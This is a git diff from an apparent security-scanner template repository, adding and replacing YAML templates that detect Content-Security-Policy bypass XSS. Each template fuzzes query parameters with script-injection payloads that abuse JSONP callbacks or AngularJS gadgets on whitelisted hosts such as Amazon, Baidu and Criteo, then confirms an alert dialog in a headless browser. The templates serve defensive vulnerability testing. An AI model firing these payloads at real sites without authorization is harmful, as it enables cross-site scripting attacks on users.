 create mode 100644 dast/vulnerabilities/xss/csp/google-ajax-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/google-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/googleapis-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/gstatic-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml
 rename dast/vulnerabilities/xss/csp/{lpsnmedia-csp-xss.yaml => lpsnmedia-accdn-csp-xss.yaml} (50%)
 create mode 100644 dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/mi-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
 rename dast/vulnerabilities/xss/csp/{meteoprog-csp-xss.yaml => www-meteoprog-csp-xss.yaml} (50%)
 create mode 100644 dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
 delete mode 100644 dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
 create mode 100644 dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml

diff --git a/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml
new file mode 100644
index 00000000000..6e557c29dd5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: 1688-bebezoo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via 1688 Bebezoo
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,1688
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bebezoo_1688_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bebezoo_1688_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml
deleted file mode 100644
index a55fd8da551..00000000000
--- a/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: 360cn-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via 360.cn
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L208C19-L208C106
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,360cn
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://zhike.help.360.cn/api/v1/robotWindow?callback=alert(1)-"></script>'
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "360.cn"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml
similarity index 51%
rename from dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml
rename to dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml
index 81c57a63570..dad3a24bbc3 100644
--- a/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml
@@ -1,11 +1,11 @@
-id: aliexpress-csp-xss
+id: aliexpress-acs-csp-xss
 
 info:
-  name: Content-Security-Policy Bypass via AliExpress
-  author: DhiyaneshDK
-  severity: high
+  name: Content-Security-Policy Bypass via AliExpress ACS
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L4C5-L4C19
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,aliexpress
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "aliexpress.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: aliexpress_acs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "aliexpress_acs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml
new file mode 100644
index 00000000000..e1930202cb4
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: amazon-aax-eu-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Amazon AAX EU
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,amazon
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://aax-eu.amazon.com/e/xsp/getAdj?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: amazon_aax_eu_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "amazon_aax_eu_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
deleted file mode 100644
index 2c6a6cfb7f2..00000000000
--- a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml
+++ /dev/null
@@ -1,51 +0,0 @@
-id: amazon-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Amazon
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L136
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L5C19-L5C100
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,amazon
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - <body ng-app ng-csp><script src="https://romania.amazon.com/app/vendor.min.js"></script><input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'></body>
-        - <script src="https://aax-eu.amazon.com/e/xsp/getAdj?callback=alert(1)-"></script>
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{url_encode(injection)}}"
-
-    stop-at-first-match: true
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "amazon.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml
new file mode 100644
index 00000000000..840966bbaf9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: app-link-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via App Link
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,app
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://app.link/_r?sdk=web&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: app_link_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "app_link_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml
new file mode 100644
index 00000000000..136e3a1553e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: baidu-map-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Baidu Map API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,baidu
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.map.baidu.com/api?v=2.0&ak=&s=1&callback=alert(document.domain)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: baidu_map_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "baidu_map_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml
new file mode 100644
index 00000000000..11ea3a00a3b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: bazaarvoice-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Bazaarvoice API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bazaarvoice
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.bazaarvoice.com/data/batch.json?passkey=e75powr7wqhg1ah5seu00zawf&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bazaarvoice_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bazaarvoice_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml
new file mode 100644
index 00000000000..d0f39f40e0e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: bdimg-apps-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via BDIMG Apps
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bdimg
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bdimg_apps_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bdimg_apps_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml
new file mode 100644
index 00000000000..4367e790d4d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: bing-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Bing API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bing
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.bing.com/osjson.aspx?query=x&JsonType=callback&JsonCallback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: bing_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "bing_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml
new file mode 100644
index 00000000000..0fbfa12fe91
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: cas-criteo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Criteo CAS
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,criteo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://cas.criteo.com/delivery/0.1/napi.jsonp?zoneid=377600&callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: cas_criteo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
